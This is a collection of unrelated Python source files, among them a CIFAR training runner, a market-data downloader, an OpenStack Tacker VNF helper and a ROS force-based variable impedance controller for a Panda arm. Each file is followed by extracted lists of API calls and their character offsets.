# logger.info("预期本次[反向套利:卖ETH/BNC -> 买BIG/BNC -> 卖BIG/ETH]利润: {0:.2f}%, {1}".format(neg_anc*100,result))
#
# print("休眠10秒")
# print("")
# time.sleep(10)
| [
"logging.getLogger",
"time.sleep",
"common.gen_logger",
"json.load",
"bigone.BigOneDog"
]
| [((4131, 4155), 'common.gen_logger', 'gen_logger', (['"""bigonetest"""'], {}), "('bigonetest')\n", (4141, 4155), False, 'from common import gen_logger\n'), ((4169, 4196), 'logging.getLogger', 'logging.getLogger', (['"""bigone"""'], {}), "('bigone')\n", (4186, 4196), False, 'import logging\n'), ((4294, 4316), 'bigone.BigOneDog', 'BigOneDog', (['private_key'], {}), '(private_key)\n', (4303, 4316), False, 'from bigone import BigOneDog\n'), ((4264, 4276), 'json.load', 'json.load', (['f'], {}), '(f)\n', (4273, 4276), False, 'import json\n'), ((4698, 4712), 'time.sleep', 'time.sleep', (['(10)'], {}), '(10)\n', (4708, 4712), False, 'import time\n')] |
import os
import yaml
import logging
import importlib
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
logging.getLogger('tensorflow').disabled = True
from cifar_training_tools import cifar_training, cifar_error_test
def print_dict(d, tabs=0):
tab = '\t'
for key in d:
if type(d[key]) == dict:
print(f"{tab*tabs}{key}:")
print_dict(d[key], tabs+1)
else:
print(f"{tab*tabs}{key}: {d[key]}")
print('\n' + '#' * 19)
print("TESTING FOR ERRORS!")
print('#' * 19)
stream = open('experiments.yaml', 'r')
for exp in yaml.safe_load_all(stream):
if 'skip_error_test' in exp and exp['skip_error_test']:
continue
model = getattr(importlib.import_module(exp['module']), exp['model'])
cifar_error_test(model(**exp['model_parameters']))
print("OK!")
print('\n' + '#' * 22)
print("MODEL TRAINING BEGINS!")
print('#' * 22)
stream = open('experiments.yaml', 'r')
for exp in yaml.safe_load_all(stream):
print(); print_dict(exp); print();
model = getattr(importlib.import_module(exp['module']), exp['model'])
cifar_training(model(**exp['model_parameters']), **exp['train_parameters']) | [
"logging.getLogger",
"importlib.import_module",
"yaml.safe_load_all"
]
| [((578, 604), 'yaml.safe_load_all', 'yaml.safe_load_all', (['stream'], {}), '(stream)\n', (596, 604), False, 'import yaml\n'), ((966, 992), 'yaml.safe_load_all', 'yaml.safe_load_all', (['stream'], {}), '(stream)\n', (984, 992), False, 'import yaml\n'), ((96, 127), 'logging.getLogger', 'logging.getLogger', (['"""tensorflow"""'], {}), "('tensorflow')\n", (113, 127), False, 'import logging\n'), ((712, 750), 'importlib.import_module', 'importlib.import_module', (["exp['module']"], {}), "(exp['module'])\n", (735, 750), False, 'import importlib\n'), ((1058, 1096), 'importlib.import_module', 'importlib.import_module', (["exp['module']"], {}), "(exp['module'])\n", (1081, 1096), False, 'import importlib\n')] |
# -*- coding: utf-8 -*-
import os,sys
from PyQt4 import QtGui,QtCore
dataRoot = os.path.abspath(os.path.join(os.path.dirname(__file__),os.pardir,os.pardir,'histdata'))
sys.path.append(dataRoot)
import dataCenter as dataCenter
from data.mongodb.DataSourceMongodb import Mongodb
import datetime as dt
def getSymbols():
#mid 1)从excel赋值粘贴获得如下数据
codesStr = """
XAGUSD
"""
#mid 2)将字符串使用split()分割为list,默认会去除\n和所有空格。
#codeList = ['000021.SZ','000022.SZ']
codeList = [code.split('.')[0] for code in codesStr.split()]
return codeList
def subMain():
DC = dataCenter.dataCenter()
remoteDataSourceType = 'mt5'
localStorageType = 'mongodb'
periodType = 'D'
timeStart = dt.datetime(2000,10,20)
timeEnd = dt.datetime.now()
# 1)get codes form eastmoney
codeList = getSymbols()
# 2)download history data
dataDict = DC.downloadHistData(providerType=remoteDataSourceType,storageType=localStorageType,periodType=periodType,
codeList=codeList,timeFrom = timeStart,timeTo = timeEnd)
if __name__ == '__main__':
#app = QtGui.QApplication(sys.argv)
#mid-----------------------------------------------------------------------------------------------------------------------------
subMain()
#mid-----------------------------------------------------------------------------------------------------------------------------
#sys.exit(app.exec_()) | [
"datetime.datetime",
"datetime.datetime.now",
"os.path.dirname",
"dataCenter.dataCenter",
"sys.path.append"
]
| [((177, 202), 'sys.path.append', 'sys.path.append', (['dataRoot'], {}), '(dataRoot)\n', (192, 202), False, 'import os, sys\n'), ((629, 652), 'dataCenter.dataCenter', 'dataCenter.dataCenter', ([], {}), '()\n', (650, 652), True, 'import dataCenter as dataCenter\n'), ((762, 787), 'datetime.datetime', 'dt.datetime', (['(2000)', '(10)', '(20)'], {}), '(2000, 10, 20)\n', (773, 787), True, 'import datetime as dt\n'), ((800, 817), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (815, 817), True, 'import datetime as dt\n'), ((110, 135), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (125, 135), False, 'import os, sys\n')] |
# Copyright (C) 2021 Nippon Telegraph and Telephone Corporation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from tacker.sol_refactored.common import exceptions as sol_ex
from tacker.sol_refactored import objects
LOG = logging.getLogger(__name__) # not used at the moment
def get_inst(context, inst_id):
inst = objects.VnfInstanceV2.get_by_id(context, inst_id)
if inst is None:
raise sol_ex.VnfInstanceNotFound(inst_id=inst_id)
return inst
def get_inst_all(context):
return objects.VnfInstanceV2.get_all(context)
def inst_href(inst_id, endpoint):
return "{}/v2/vnflcm/vnf_instances/{}".format(endpoint, inst_id)
def make_inst_links(inst, endpoint):
links = objects.VnfInstanceV2_Links()
self_href = inst_href(inst.id, endpoint)
links.self = objects.Link(href=self_href)
if inst.instantiationState == 'NOT_INSTANTIATED':
links.instantiate = objects.Link(href=self_href + "/instantiate")
else: # 'INSTANTIATED'
links.terminate = objects.Link(href=self_href + "/terminate")
# TODO(oda-g): add when the operation supported
# links.scale = objects.Link(href = self_href + "/scale")
# etc.
return links
# see IETF RFC 7396
def json_merge_patch(target, patch):
if isinstance(patch, dict):
if not isinstance(target, dict):
target = {}
for key, value in patch.items():
if value is None:
if key in target:
del target[key]
else:
target[key] = json_merge_patch(target.get(key), value)
return target
else:
return patch
def select_vim_info(vim_connection_info):
# NOTE: It is assumed that vimConnectionInfo has only one item
# at the moment. If there are multiple items, it is uncertain
# which item is selected.
for vim_info in vim_connection_info.values():
return vim_info
| [
"tacker.sol_refactored.objects.Link",
"tacker.sol_refactored.objects.VnfInstanceV2.get_by_id",
"tacker.sol_refactored.objects.VnfInstanceV2.get_all",
"oslo_log.log.getLogger",
"tacker.sol_refactored.common.exceptions.VnfInstanceNotFound",
"tacker.sol_refactored.objects.VnfInstanceV2_Links"
]
| [((812, 839), 'oslo_log.log.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (829, 839), True, 'from oslo_log import log as logging\n'), ((911, 960), 'tacker.sol_refactored.objects.VnfInstanceV2.get_by_id', 'objects.VnfInstanceV2.get_by_id', (['context', 'inst_id'], {}), '(context, inst_id)\n', (942, 960), False, 'from tacker.sol_refactored import objects\n'), ((1096, 1134), 'tacker.sol_refactored.objects.VnfInstanceV2.get_all', 'objects.VnfInstanceV2.get_all', (['context'], {}), '(context)\n', (1125, 1134), False, 'from tacker.sol_refactored import objects\n'), ((1291, 1320), 'tacker.sol_refactored.objects.VnfInstanceV2_Links', 'objects.VnfInstanceV2_Links', ([], {}), '()\n', (1318, 1320), False, 'from tacker.sol_refactored import objects\n'), ((1383, 1411), 'tacker.sol_refactored.objects.Link', 'objects.Link', ([], {'href': 'self_href'}), '(href=self_href)\n', (1395, 1411), False, 'from tacker.sol_refactored import objects\n'), ((996, 1039), 'tacker.sol_refactored.common.exceptions.VnfInstanceNotFound', 'sol_ex.VnfInstanceNotFound', ([], {'inst_id': 'inst_id'}), '(inst_id=inst_id)\n', (1022, 1039), True, 'from tacker.sol_refactored.common import exceptions as sol_ex\n'), ((1494, 1539), 'tacker.sol_refactored.objects.Link', 'objects.Link', ([], {'href': "(self_href + '/instantiate')"}), "(href=self_href + '/instantiate')\n", (1506, 1539), False, 'from tacker.sol_refactored import objects\n'), ((1594, 1637), 'tacker.sol_refactored.objects.Link', 'objects.Link', ([], {'href': "(self_href + '/terminate')"}), "(href=self_href + '/terminate')\n", (1606, 1637), False, 'from tacker.sol_refactored import objects\n')] |
#! /usr/bin/env python
import copy
from copy import deepcopy
import rospy
import threading
import quaternion
import numpy as np
from geometry_msgs.msg import Point
from visualization_msgs.msg import *
from franka_interface import ArmInterface
from panda_robot import PandaArm
import matplotlib.pyplot as plt
from scipy.spatial.transform import Rotation
np.set_printoptions(precision=2)
"""
This is a FORCE-BASED VARIABLE IMPEDANCE CONTROLLER based on [Huang1992: Compliant Motion Control of Robots by Using Variable Impedance]
To achieve force tracking, the apparent stiffness (K) and damping (B) is dynamically adjusted through functions dependent on the error in position, velocity and force
About the code/controller:
1] Only stiffness and damping in the 'z'-direction is adaptive, the rest are static
2] Due to the faulted joint velocities (read from rostopics), the more noisy,
numerically derived derivatives of the joint position are prefered to be
used in the controller { get_x_dot(..., numerically = True) }
3] You can now choose between perform_torque_Huang1992() and perform_torque_DeSchutter()
- DeSchutter's control-law offers geometrically consitent stiffness and is more computationally expensive
4] The default desired motion- and force-trajectories are now made in a time-consistent matter, so that the PUBLISH RATE can be altered without messing up the desired behaviour.
The number of iterations is calculated as a function of the controller's control-cycle, T: (max_num_it = duration(=15 s) / T)
"""
# --------- Constants -----------------------------
#print(robot.joint_ordered_angles()) #Read the robot's joint-angles
#new_start = {'panda_joint1': 1.938963389436404, 'panda_joint2': 0.6757504724282993, 'panda_joint3': -0.43399745125475564, 'panda_joint4': -2.0375275954865573, 'panda_joint5': -0.05233040021194351, 'panda_joint6': 3.133254153457202, 'panda_joint7': 1.283328743909796}
# Stiffness
Kp = 30
Kpz = 30 #initial value (adaptive)
Ko = 900
K = np.array([[Kp, 0, 0, 0, 0, 0],
[0, Kp, 0, 0, 0, 0],
[0, 0, Kpz, 0, 0, 0],
[0, 0, 0, Ko, 0, 0],
[0, 0, 0, 0, Ko, 0],
[0, 0, 0, 0, 0, Ko]])
# Damping
Bp = Kp/7
Bpz = Bp # #initial value (adaptive)
Bo = 50
B = np.array([[Bp, 0, 0, 0, 0, 0],
[0, Bp, 0, 0, 0, 0],
[0, 0, Bpz, 0, 0, 0],
[0, 0, 0, Bo, 0, 0],
[0, 0, 0, 0, Bo, 0],
[0, 0, 0, 0, 0, Bo]])
# Apparent inertia
Mp = 10
Mo = 10
M_diag = np.array([Mp,Mp,Mp,Mo,Mo,Mo])
M = np.diagflat(M_diag)
# Constant matrices appearing in equation (50) of [Huang1992]
K_v = np.identity(6)
P = np.identity(6)
gamma = np.identity(18)
#gamma_M = 12
gamma_B = 0.001 #2 # The damping's rate of adaptivity (high value = slow changes)
gamma_K = 0.0005 #1 # The stiffness' rate of adaptivity (high value = slow changes)
#gamma[2,2] = gamma_M
gamma[8,8] = gamma_B
gamma[14,14] = gamma_K
duration = 15 #seconds SHOULD NOT BE ALTERED
"""Functions for generating desired MOTION trajectories"""
#1 Generate a desired trajectory for the manipulator to follow
def generate_desired_trajectory(iterations,T):
a = np.zeros((6,iterations))
v = np.zeros((6,iterations))
p = np.zeros((3,iterations))
p[:,0] = get_p()
if iterations > 300:
a[2,0:100]=-0.00001/T**2
a[2,250:350]=0.00001/T**2
if iterations > 6500:
a[0,4500:4510]=0.00001/T**2
a[0,6490:6500]=-0.00001/T**2
for i in range(max_num_it):
if i>0:
v[:,i]=v[:,i-1]+a[:,i-1]*T
p[:,i]=p[:,i-1]+v[:3,i-1]*T
return a,v,p
#2 Generate a desired trajectory for the manipulator to follow
def generate_desired_trajectory_express(iterations,T):
a = np.zeros((6,iterations))
v = np.zeros((6,iterations))
p = np.zeros((3,iterations))
p[:,0] = get_p()
if iterations > 175:
a[2,0:50]=-0.00002/T**2
a[2,125:175]=0.00002/T**2
if iterations > 3250:
a[0,2250:2255]=0.00002/T**2
a[0,3245:3250]=-0.00002/T**2
for i in range(max_num_it):
if i>0:
v[:,i]=v[:,i-1]+a[:,i-1]*T
p[:,i]=p[:,i-1]+v[:3,i-1]*T
return a,v,p
#3 Generate a (time-consistent) desired motion trajectory
def generate_desired_trajectory_tc(iterations,T,move_in_x=False):
a = np.zeros((6,iterations))
v = np.zeros((6,iterations))
p = np.zeros((3,iterations))
p[:,0] = get_p()
a[2,0:int(iterations/75)]=-1.25
a[2,int(iterations*2/75):int(iterations/25)]= 1.25
if move_in_x:
a[0,int(iterations*3/5):int(iterations*451/750)]=1.25
a[0,int(iterations*649/750):int(iterations*13/15)]=-1.25
for i in range(max_num_it):
if i>0:
v[:,i]=v[:,i-1]+a[:,i-1]*T
p[:,i]=p[:,i-1]+v[:3,i-1]*T
return a,v,p
"""Functions for generating desired FORCE trajectories"""
#1 Generate a desired force trajectory
def generate_F_d(max_num_it,T):
a = np.zeros((6,max_num_it))
v = np.zeros((6,max_num_it))
s = np.zeros((6,max_num_it))
a[2,0:100] = 0.0005/T**2
a[2,100:200] = - 0.0005/T**2
if max_num_it > 1100:
a[2,500:550] = 0.0002/T**2
if max_num_it >4001:
a[2,1500:1550]=-0.0002/T**2
it = 2000
while it <= 4000:
a[2,it]= (-9*(np.pi**2)*(T/4)**2*np.sin(it*T/4*2*np.pi+np.pi/2))/T**2
it+=1
a[2,4001]=0.0001/T**2
for i in range(max_num_it):
if i>0:
v[2,i]=v[2,i-1]+a[2,i-1]*T
s[2,i]=s[2,i-1]+v[2,i-1]*T
return s
#2 Generate an efficient desired force trajectory
def generate_F_d_express(max_num_it,T):
a = np.zeros((6,max_num_it))
v = np.zeros((6,max_num_it))
s = np.zeros((6,max_num_it))
a[2,0:50] = 0.0010/T**2
a[2,100:150] = - 0.0010/T**2
if max_num_it > 275:
a[2,250:275] = 0.0008/T**2
if max_num_it >2001:
a[2,750:775]=-0.0008/T**2
it = 1000
while it <= 2000:
a[2,it]= (-9*(np.pi**2)*(T/4)**2*np.sin(2*it*T/4*2*np.pi+np.pi/2))/T**2
it+=1
a[2,2001]=0.0001/T**2
for i in range(max_num_it):
if i>0:
v[2,i]=v[2,i-1]+a[2,i-1]*T
s[2,i]=s[2,i-1]+v[2,i-1]*T
return s
#3 Generate a (time-consistent) desired force trajectory
def generate_F_d_tc(max_num_it,T):
a = np.zeros((6,max_num_it))
v = np.zeros((6,max_num_it))
s = np.zeros((6,max_num_it))
a[2,0:int(max_num_it/75)] = 62.5
a[2,int(max_num_it/37.5):int(max_num_it/25)] = - 62.5
if max_num_it > 275:
a[2,int(max_num_it/15):int(max_num_it*11/150)] = 50
if max_num_it >2001:
a[2,int(max_num_it/5):int(max_num_it*31/150)]=-50
it = int(max_num_it*4/15)
while it <= int(max_num_it*8/15):
a[2,it]= (-9*(np.pi**2)*(T/4)**2*np.sin(2*it*T/4*2*np.pi+np.pi/2))/T**2
it+=1
a[2,int(max_num_it*8/15+1)]=6.25
for i in range(max_num_it):
if i>0:
v[2,i]=v[2,i-1]+a[2,i-1]*T
s[2,i]=s[2,i-1]+v[2,i-1]*T
return s
# ------------ Helper functions --------------------------------
# Calculate the numerical derivative of a each row in a vector
def get_derivative_of_vector(history,iteration,T):
size = history.shape[0]
if iteration > 0:
return np.subtract(history[:,iteration],history[:,iteration-1])/T
else:
return np.zeros(size)
# Saturation-function
def ensure_limits(lower,upper,matrix):
for i in range(6):
if matrix[i,i] > upper:
matrix[i,i] = upper
elif matrix[i,i] < lower:
matrix[i,i] = lower
# Return the cartesian (task-space) inertia of the manipulator [alternatively the inverse of it]
def get_W(inv = False):
W = np.linalg.multi_dot([robot.jacobian(),np.linalg.inv(robot.joint_inertia_matrix()),robot.jacobian().T])
if inv == True:
return np.linalg.inv(W)
else:
return W
# Return the external forces (everything except for z-force is set to 0 due to offsets)
def get_F_ext(two_dim = False):
if two_dim == True:
return np.array([0,0,robot.endpoint_effort()['force'][2],0,0,0]).reshape([6,1])
else:
return np.array([0,0,robot.endpoint_effort()['force'][2],0,0,0])
# Return the position and (relative) orientation
def get_x(goal_ori):
pos_x = robot.endpoint_pose()['position']
rel_ori = quatdiff_in_euler_radians(goal_ori, np.asarray(robot.endpoint_pose()['orientation']))
return np.append(pos_x,rel_ori)
# Return the linear and angular velocities
# Numerically = True -> return the derivarive of the state-vector
# Numerically = False -> read values from rostopic (faulty in sim when interacting with the environment)
def get_x_dot(x_hist,i,T, numerically=False):
if numerically == True:
return get_derivative_of_vector(x_hist,i,T)
else:
return np.append(robot.endpoint_velocity()['linear'],robot.endpoint_velocity()['angular'])
# Return the error in position and orientation
def get_delta_x(goal_ori, p_d, two_dim = False):
delta_pos = p_d - robot.endpoint_pose()['position']
delta_ori = quatdiff_in_euler_radians(np.asarray(robot.endpoint_pose()['orientation']), goal_ori)
if two_dim == True:
return np.array([np.append(delta_pos,delta_ori)]).reshape([6,1])
else:
return np.append(delta_pos,delta_ori)
# Return the error in linear and angular velocities
def get_x_dot_delta(x_d_dot,x_dot, two_dim = True):
if two_dim == True:
return (x_d_dot - x_dot).reshape([6,1])
else:
return x_d_dot - x_dot
# Return the error in linear and angular acceleration
def get_x_ddot_delta(x_d_ddot,v_history,i,T):
a = get_derivative_of_vector(v_history,i,T)
return x_d_ddot-a
# Return the cartesian (task-space) position
def get_p(two_dim=False):
if two_dim == True:
return robot.endpoint_pose()['position'].reshape([3,1])
else:
return robot.endpoint_pose()['position']
# Compute difference between quaternions and return Euler angle in radians as difference
def quatdiff_in_euler_radians(quat_curr, quat_des):
curr_mat = quaternion.as_rotation_matrix(quat_curr)
des_mat = quaternion.as_rotation_matrix(quat_des)
rel_mat = des_mat.T.dot(curr_mat)
rel_quat = quaternion.from_rotation_matrix(rel_mat)
vec = quaternion.as_float_array(rel_quat)[1:]
if rel_quat.w < 0.0:
vec = -vec
return -des_mat.dot(vec)
# -------------- Main functions --------------------
# Get xi as it is described in equation (44) in [Huang1992]
def get_xi(goal_ori, p_d, x_dot, x_d_dot, x_d_ddot, v_history, i, T):
E = -get_delta_x(goal_ori, p_d)
E_dot = -get_x_dot_delta(x_d_dot,x_dot, two_dim = False)
E_ddot = -get_x_ddot_delta(x_d_ddot,v_history,i,T)
E_diag = np.diagflat(E)
E_dot_diag = np.diagflat(E_dot)
E_ddot_diag = np.diagflat(E_ddot)
return np.block([E_ddot_diag,E_dot_diag,E_diag])
# Calculate lambda_dot as in equation (50) in [Huang1992]
def get_lambda_dot(gamma,xi,K_v,P,F_d):
return np.linalg.multi_dot([-np.linalg.inv(gamma),xi.T,np.linalg.inv(K_v),P,get_F_ext(two_dim=True)-F_d.reshape([6,1])])
# Return the updated (adapted) Inertia, Damping and Stiffness matrices.
def update_MBK_hat(lam,M,B,K):
M_hat = M # + np.diagflat(lam[0:6]) M is chosen to be constant
B_hat = B + np.diagflat(lam[6:12])
K_hat = K + np.diagflat(lam[12:18])
#ensure_limits(1,5000,M_hat)
ensure_limits(1,5000,B_hat)
ensure_limits(1,5000,K_hat)
return M_hat, B_hat, K_hat
# Calculate and perform the torque as in equation (10) in [Huang1992]
def perform_torque_Huang1992(M, B, K, x_d_ddot, x_d_dot,x_dot, p_d, goal_ori):
a = np.linalg.multi_dot([robot.jacobian().T,get_W(inv=True),np.linalg.inv(M)])
b = np.array([np.dot(M,x_d_ddot)]).reshape([6,1]) + np.array([np.dot(B,get_x_dot_delta(x_d_dot,x_dot))]).reshape([6,1]) + np.array([np.dot(K,get_delta_x(goal_ori,p_d,two_dim = True))]).reshape([6,1])
c = robot.coriolis_comp().reshape([7,1])
d = (np.identity(6)-np.dot(get_W(inv=True),np.linalg.inv(M))).reshape([6,6])
total_torque = np.array([np.dot(a,b)]).reshape([7,1]) + c + np.array([np.linalg.multi_dot([robot.jacobian().T,d,get_F_ext()])]).reshape([7,1])
robot.set_joint_torques(dict(list(zip(robot.joint_names(),total_torque))))
"""
TESTING AREA (Functions needed to run an adaptive version of DeSchutter's impedance controller)
[with geometrically consistent stiffness]
"""
def skew(vector):
return np.array([[0, -vector[2], vector[1]],
[vector[2], 0, -vector[0]],
[-vector[1], vector[0], 0]])
def from_three_to_six_dim(matrix):
return np.block([[matrix,np.zeros((3,3))],[np.zeros((3,3)),matrix]])
def get_K_Pt_dot(R_d,K_pt,R_e):
return np.array([0.5*np.linalg.multi_dot([R_d,K_pt,R_d.T])+0.5*np.linalg.multi_dot([R_e,K_pt,R_e.T])])
def get_K_Pt_ddot(p_d,R_d,K_pt):
return np.array([0.5*np.linalg.multi_dot([skew(p_d-robot.endpoint_pose()['position']),R_d,K_pt,R_d.T])])
def E_quat(quat_n,quat_e):
return np.dot(quat_n,np.identity(3))-skew(quat_e)
def get_K_Po_dot(quat_n,quat_e,R_e,K_po):
return np.array([2*np.linalg.multi_dot([E_quat(quat_n,quat_e).T,R_e,K_po,R_e.T])])
def get_h_delta(K_pt_dot,K_pt_ddot,p_delta,K_po_dot,quat_e):
f_delta_t = np.array([np.dot(K_pt_dot,p_delta)])
m_delta_t = np.array([np.dot(K_pt_ddot,p_delta)])
null = np.zeros((3,1))
m_delta_o = np.array([np.dot(K_po_dot,quat_e)])
return np.array([np.append(f_delta_t.T,m_delta_t.T)]).T + np.array([np.append(null.T,m_delta_o.T)]).T
def perform_torque_DeSchutter(M, B, K, x_d_ddot, x_d_dot,x_dot, p_d, Rot_d): # must include Rot_d
J = robot.jacobian()
Rot_e = robot.endpoint_pose()['orientation_R']
Rot_e_bigdim = from_three_to_six_dim(Rot_e)
Rot_e_dot = np.dot(skew(robot.endpoint_velocity()['angular']),Rot_e) #not a 100 % sure about this one
Rot_e_dot_bigdim = from_three_to_six_dim(Rot_e_dot)
quat = quaternion.from_rotation_matrix(np.dot(Rot_e.T,Rot_d)) #orientational displacement represented as a unit quaternion
#quat = robot.endpoint_pose()['orientation']
quat_e_e = np.array([quat.x,quat.y,quat.z]) # vector part of the unit quaternion in the frame of the end effector
quat_e = np.dot(Rot_e.T,quat_e_e) # ... in the base frame
quat_n = quat.w
p_delta = p_d-robot.endpoint_pose()['position']
K_Pt_dot = get_K_Pt_dot(Rot_d,K[:3,:3],Rot_e)
K_Pt_ddot = get_K_Pt_ddot(p_d,Rot_d,K[:3,:3])
K_Po_dot = get_K_Po_dot(quat_n,quat_e,Rot_e,K[3:,3:])
h_delta_e = np.array(np.dot(Rot_e_bigdim,get_h_delta(K_Pt_dot,K_Pt_ddot,p_delta,K_Po_dot,quat_e))).reshape([6,1])
h_e = get_F_ext(two_dim=True)
h_e_e = np.array(np.dot(Rot_e_bigdim,h_e))
a_d_e = np.dot(Rot_e_bigdim,x_d_ddot).reshape([6,1])
v_d_e = np.dot(Rot_e_bigdim,x_d_dot).reshape([6,1])
alpha_e = a_d_e + np.dot(np.linalg.inv(M),(np.dot(B,v_d_e.reshape([6,1])-np.dot(Rot_e_bigdim,x_dot).reshape([6,1]))+h_delta_e-h_e_e)).reshape([6,1])
alpha = np.dot(Rot_e_bigdim.T,alpha_e).reshape([6,1])+np.dot(Rot_e_dot_bigdim.T,np.dot(Rot_e_bigdim,x_dot)).reshape([6,1])
torque = np.linalg.multi_dot([J.T,get_W(inv=True),alpha]).reshape((7,1)) + np.array(robot.coriolis_comp().reshape((7,1))) + np.dot(J.T,h_e).reshape((7,1))
robot.set_joint_torques(dict(list(zip(robot.joint_names(),torque))))
"""
TESTING AREA
"""
# -------------- Plotting ------------------------
def plot_result(v_num, v,p,p_d, delta_x, F_ext,F_d, z_dynamics,M,B,K, T):
time_array = np.arange(len(p[0]))*T
plt.subplot(211)
plt.title("External force")
plt.plot(time_array, F_ext[2], label="force z [N]")
plt.plot(time_array, F_d[2], label="desired force z [N]", color='b',linestyle='dashed')
plt.xlabel("Real time [s]")
plt.legend()
plt.subplot(212)
plt.title("Position")
plt.plot(time_array, p[0,:], label = "true x [m]")
plt.plot(time_array, p[1,:], label = "true y [m]")
plt.plot(time_array, p[2,:], label = "true z [m]")
plt.plot(time_array, p_d[0,:], label = "desired x [m]", color='b',linestyle='dashed')
plt.plot(time_array, p_d[1,:], label = "desired y [m]", color='C1',linestyle='dashed')
plt.plot(time_array, p_d[2,:], label = "desired z [m]", color='g',linestyle='dashed')
plt.xlabel("Real time [s]")
plt.legend()
"""
plt.subplot(233)
plt.title("Orientation error in Euler")
plt.plot(time_array, delta_x[3]*(180/np.pi), label = "error Ori_x [degrees]")
plt.plot(time_array, delta_x[4]*(180/np.pi), label = "error Ori_y [degrees]")
plt.plot(time_array, delta_x[5]*(180/np.pi), label = "error Ori_z [degrees]")
plt.xlabel("Real time [s]")
plt.legend()
plt.subplot(234)
plt.title("Adaptive dynamics along the z-axis")
plt.plot(time_array, z_dynamics[0], label = "inertia (M_z)")
plt.plot(time_array, z_dynamics[1], label = "damping (B_z)")
plt.plot(time_array, z_dynamics[2], label = "stiffness (K_z)")
plt.axhline(y=M[2][2], label = "initial inertia (M_z)", color='b',linestyle='dashed')
plt.axhline(y=B[2][2], label = "initial damping (B_z)", color='C1',linestyle='dashed')
plt.axhline(y=K[2][2], label = "initial stiffness (K_z)", color='g',linestyle='dashed')
plt.xlabel("Real time [s]")
plt.legend()
plt.subplot(235)
plt.title("velocity read from rostopic")
plt.plot(time_array, v[0], label = "vel x")
plt.plot(time_array, v[1], label = "vel y")
plt.plot(time_array, v[2], label = "vel z")
plt.plot(time_array, v[3], label = "ang x")
plt.plot(time_array, v[4], label = "ang y")
plt.plot(time_array, v[5], label = "ang z")
plt.xlabel("Real time [s]")
plt.legend()
plt.subplot(236)
plt.title("numerically calculated velocity")
plt.plot(time_array, v_num[0], label = "vel x")
plt.plot(time_array, v_num[1], label = "vel y")
plt.plot(time_array, v_num[2], label = "vel z")
plt.plot(time_array, v_num[3], label = "ang x")
plt.plot(time_array, v_num[4], label = "ang y")
plt.plot(time_array, v_num[5], label = "ang z")
plt.xlabel("Real time [s]")
plt.legend()
"""
plt.show()
if __name__ == "__main__":
# ---------- Initialization -------------------
rospy.init_node("impedance_control")
robot = PandaArm()
publish_rate = 250
rate = rospy.Rate(publish_rate)
T = 0.001*(1000/publish_rate)
max_num_it = int(duration /T)
#robot.move_to_joint_positions(new_start)
robot.move_to_neutral()
# List used to contain data needed for calculation of the torque output
lam = np.zeros(18)
v_history = np.zeros((6,max_num_it))
# Lists providing data for plotting
p_history = np.zeros((3,max_num_it))
v_history_num = np.zeros((6,max_num_it))
x_history = np.zeros((6,max_num_it))
delta_x_history = np.zeros((6,max_num_it))
F_ext_history = np.zeros((6,max_num_it))
z_dynamics_history = np.zeros((3,max_num_it))
# Specify the desired behaviour of the robot
x_d_ddot, x_d_dot, p_d = generate_desired_trajectory_tc(max_num_it,T,move_in_x = True)
goal_ori = np.asarray(robot.endpoint_pose()['orientation']) # goal orientation = current (initial) orientation [remains the same the entire duration of the run]
Rot_d = robot.endpoint_pose()['orientation_R'] # used by the DeSchutter implementation
F_d = generate_F_d_tc(max_num_it,T)
# ----------- The control loop -----------
for i in range(max_num_it):
# update state-lists
p_history[:,i] = get_p()
x_history[:,i] = get_x(goal_ori)
delta_x_history[:,i] = get_delta_x(goal_ori,p_d[:,i])
F_ext_history[:,i] = get_F_ext()
x_dot = get_x_dot(x_history,i,T, numerically=False) #chose 'numerically' either 'True' or 'False'
v_history_num[:,i] = get_x_dot(x_history,i,T, numerically=True) # only for plotting
v_history[:,i] = get_x_dot(x_history,i,T) # for calculating error in acceleration
# adapt M,B and K
xi = get_xi(goal_ori, p_d[:,i],x_dot, x_d_dot[:,i], x_d_ddot[:,i], v_history, i, T)
lam = lam.reshape([18,1]) + get_lambda_dot(gamma,xi,K_v,P,F_d[:,i]).reshape([18,1])*T
M_hat,B_hat,K_hat = update_MBK_hat(lam,M,B,K)
# Apply the resulting torque to the robot
"""CHOOSE ONE OF THE TWO CONTROLLERS BELOW"""
perform_torque_Huang1992(M_hat, B_hat, K_hat, x_d_ddot[:,i], x_d_dot[:,i],x_dot, p_d[:,i], goal_ori)
#perform_torque_DeSchutter(M_hat, B_hat, K_hat, x_d_ddot[:,i], x_d_dot[:,i],x_dot, p_d[:,i], Rot_d)
rate.sleep()
# plotting and printing
z_dynamics_history[0][i]=M_hat[2][2]
z_dynamics_history[1][i]=B_hat[2][2]
z_dynamics_history[2][i]=K_hat[2][2]
# Live printing to screen when the controller is running
if i%100 == 0:
print(i,'/',max_num_it,' = ',T*i,' [s] ) Force in z: ',F_ext_history[2,i])
print(K_hat[2][2])
print('')
#Uncomment the block below to save plotting-data
"""
np.save('VIC_p_d.npy',p_d)
np.save('VIC_p.npy',p_history)
np.save('VIC_Fz_d.npy',F_d)
np.save('VIC_Fz.npy',F_ext_history[2])
np.save('VIC_delta_x.npy',delta_x_history) #orientation error in radians
np.save('VIC_adaptive_gains.npy',z_dynamics_history)
"""
plot_result(v_history_num,v_history, p_history, p_d, delta_x_history, F_ext_history, F_d, z_dynamics_history,M,B,K, T)
| [
"numpy.block",
"quaternion.as_float_array",
"numpy.linalg.multi_dot",
"rospy.init_node",
"numpy.array",
"rospy.Rate",
"numpy.sin",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"numpy.subtract",
"numpy.dot",
"numpy.diagflat",
"panda_robot.PandaArm",
"numpy.identity",
"quaternion.from_rotation_matrix",
"matplotlib.pyplot.title",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.show",
"numpy.set_printoptions",
"quaternion.as_rotation_matrix",
"numpy.append",
"numpy.zeros",
"numpy.linalg.inv",
